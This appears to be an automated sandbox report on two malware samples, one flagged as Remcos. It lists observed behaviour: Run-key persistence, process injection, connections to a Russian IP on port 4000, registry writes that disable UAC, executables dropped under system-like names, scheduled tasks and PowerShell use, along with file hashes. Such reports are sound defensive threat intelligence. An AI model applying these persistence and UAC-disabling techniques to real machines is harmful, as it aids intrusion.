memory/5720-13-0x000000001BA30000-0x000000001BAE2000-memory.dmp
memory/5720-14-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
139s
Max time network
150s
Command Line
Signatures
Remcos
Remcos family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\sbietrcl.exe" | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 440 set thread context of 3408 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe
"C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 213.183.58.19:4000 | N/A | tcp |
| RU | 213.183.58.19:4000 | N/A | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| RU | 213.183.58.19:4000 | N/A | tcp |
| RU | 213.183.58.19:4000 | N/A | tcp |
| RU | 213.183.58.19:4000 | N/A | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| RU | 213.183.58.19:4000 | N/A | tcp |
Files
memory/2012-0-0x0000000074902000-0x0000000074903000-memory.dmp
memory/2012-1-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-2-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-4-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-3-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-17-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-16-0x0000000074902000-0x0000000074903000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
| MD5 | 3dde06982003b0e533a684df3964d63e |
| SHA1 | 13247f80d6a518716b9f121591d1eeea814fc680 |
| SHA256 | 1e9f626bab720bb552f865e01a7f3b33edb848047fdcf0404d9864c7bc9088bd |
| SHA512 | 3aafe2560ba495366749738aea8e75ee415f50ef69236a2b10086711a214fa68bdc963ffec4d304dd9fc6fd6a1272451023e5862aaa7f7ef13b36242425e10af |
memory/2012-28-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/440-30-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/440-29-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/440-32-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/440-31-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/3408-36-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-33-0x0000000000400000-0x0000000000417000-memory.dmp
memory/440-44-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/3408-43-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-42-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-41-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-38-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-47-0x0000000000400000-0x0000000000417000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Sidebar\fr-FR\69ddcba757bf72 | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files\Windows Media Player\fr-FR\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\fr-FR\RCX6F24.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files\Windows Media Player\fr-FR\5940a34987c991 | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files\Microsoft Office\Office14\1033\42af1c969fbb7b | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\fr-FR\RCX6F25.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\RCX7B00.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\RCX6A40.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\RCX6A41.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\RCX7B01.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
